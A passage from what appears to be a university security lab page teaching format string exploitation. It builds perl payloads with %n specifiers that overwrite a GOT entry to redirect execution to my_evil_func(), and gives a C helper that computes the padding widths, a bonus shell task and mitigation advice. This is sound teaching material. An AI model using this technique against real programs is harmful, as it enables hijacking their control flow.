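static void store_le32(unsigned char *mem, size_t addr, uint32_t value)
{
	for (size_t i = 0; i < 4; i++)
		mem[addr + i] = (unsigned char)(value >> (8 * i));
}

static uint32_t load_le32(const unsigned char *mem, size_t addr)
{
	return (uint32_t)mem[addr] | (uint32_t)mem[addr + 1] << 8
	     | (uint32_t)mem[addr + 2] << 16 | (uint32_t)mem[addr + 3] << 24;
}

/* Replays the run above: counts 0x302, 0x402, 0x502 and 0x602 written at
 * offsets 0, 1, 2 and 3 (addresses 0x0804a008 ... 0x0804a00b). */
static void replay_writes(unsigned char *mem)
{
	const uint32_t counts[4] = {0x302, 0x402, 0x502, 0x602};

	for (size_t i = 0; i < 4; i++)
		store_le32(mem, i, counts[i]);
}
```

Only the low byte of each write survives, except for the last write, whose upper bytes spill into the next GOT entry.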

We want to write the value 0x08048494, the address of my_evil_func():

$ objdump -d ./format | grep my_evil
08048494 <my_evil_func>:

The first byte is 0x94 (little endian). With a width of 255, the first %n wrote 0x302; to write 0x294 instead, we must print 0x302 - 0x294 = 110 fewer characters, so we replace the first 255 with 255-(0x102-0x94) == 145.

$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%145x|" . "%%126\$08n" . "%%255x|" . "%%127\$08n" . "%%255x|" . "%%128\$08n" . "%%255x|" . "%%129\$08n"')"
$ gdb ./format -c core
#0  0x94949494 in ?? ()
(gdb) quit

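The next byte that we want to write is 0x84. After the first %n the count is 0x294, and we need it to reach 0x384, i.e. 240 more characters: the padding plus the | separator, so we replace 255 with 239. We can continue this idea until we profit.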

$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%145x|" . "%%126\$08n" . "%%239x|" . "%%127\$08n" . "%%127x|" . "%%128\$08n" . "%%259x|" . "%%129\$08n"')" | tr -s ' ' > /dev/null
I'm evil, but nobody calls me :-(
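The width arithmetic generalizes to any 4-byte value. The sketch below (hypothetical helper compute_widths()) assumes the payload shape used above: 514 bytes printed before the first padding specifier, one | after each padding, and a width of at least 8 so that %x never prints more characters than the width. For 0x08048494 it yields the widths used in the last command: 145, 239, 127 and 259.

```c
#include <assert.h>
#include <stdint.h>

#define MIN_WIDTH 8 /* %x of a 32-bit value prints at most 8 hex digits */

/* Computes the four %<w>x widths for a payload of the form
 *   <4 addresses><padding> (%<w>x| %<k>$n) x 4
 * so that the low byte written by the i-th %n is byte i of value
 * (little endian). prefix is the number of bytes printed before the
 * first %<w>x; every group also prints one '|' separator. */
static void compute_widths(uint32_t prefix, uint32_t value, uint32_t widths[4])
{
	uint32_t count = prefix;

	for (int i = 0; i < 4; i++) {
		uint32_t want = (value >> (8 * i)) & 0xff;
		/* smallest w with (count + w + 1) % 256 == want */
		uint32_t w = (want - (count + 1)) & 0xff;

		if (w < MIN_WIDTH)
			w += 256;
		widths[i] = w;
		count += w + 1;
	}
}
```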

[1p] Bonus task: Can you get a shell? (Assume ASLR is disabled.)

Mitigation and Recommendations

  1. Manage the string length carefully
  2. Don't use gets. With gets there is no way of limiting how much data is read (it was removed from the language in C11).
  3. Use string functions with an n (length) parameter whenever a non-constant string is involved, e.g. snprintf, strncat.
  4. Make sure that the NUL byte is added; for instance, strncpy does not add a NUL byte when the source string is at least as long as the given limit.
  5. Use wcs* functions (such as wcslen, wcsncpy) when dealing with wide char strings.
  6. Don't trust the user!
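Recommendations 3 and 4 in practice: the following is a sketch of bounded copying and formatting helpers (hypothetical names) that always produce a NUL-terminated result and report truncation.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* strncpy() leaves dst unterminated when src has at least size - 1
 * characters, so terminate explicitly. Returns 1 if src was truncated. */
static int copy_string(char *dst, size_t size, const char *src)
{
	if (size == 0)
		return 1;
	strncpy(dst, src, size - 1);
	dst[size - 1] = '\0';
	return strlen(src) >= size;
}

/* snprintf() always terminates (for size > 0) and returns the length the
 * full output would have had, which makes truncation easy to detect. */
static int format_greeting(char *dst, size_t size, const char *name)
{
	int n = snprintf(dst, size, "hello %s", name);

	return n < 0 || (size_t)n >= size;
}
```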

Real life Examples

Last modified: 2017/12/04 17:16 by razvan.deaconescu
CC Attribution-Share Alike 3.0 Unported